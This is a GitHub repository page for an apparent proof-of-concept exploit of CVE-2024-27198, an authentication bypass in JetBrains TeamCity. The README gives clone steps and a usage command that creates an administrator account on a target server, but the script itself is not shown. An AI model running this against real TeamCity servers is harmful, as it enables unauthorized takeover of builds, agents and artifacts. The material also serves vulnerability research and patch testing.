Skip to content

jrbH4CK/CVE-2024-27198

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

15 Commits
 
 
 
 
 
 

Repository files navigation

CVE-2024-27198

In JetBrains TeamCity before 2023.11.4 authentication bypass allowing to perform admin actions in TeamCity server, an attacker can take full control over all TeamCity projects, builds, agents and artifacts, finally the attacker will perfomn a RCE.

Download

git clone https://github.com/jrbH4CK/CVE-2024-27198.git
cd CVE-2024-27198

PoC

To create an account as admin privileges inside the server

python3 cve-2024-27198.py http://example.com username password

Demo:

Account creation

Texto alternativo

User roles

Texto alternativo

Additional notes

About

PoC about CVE-2024-27198

Resources

Stars

Watchers

Forks

Languages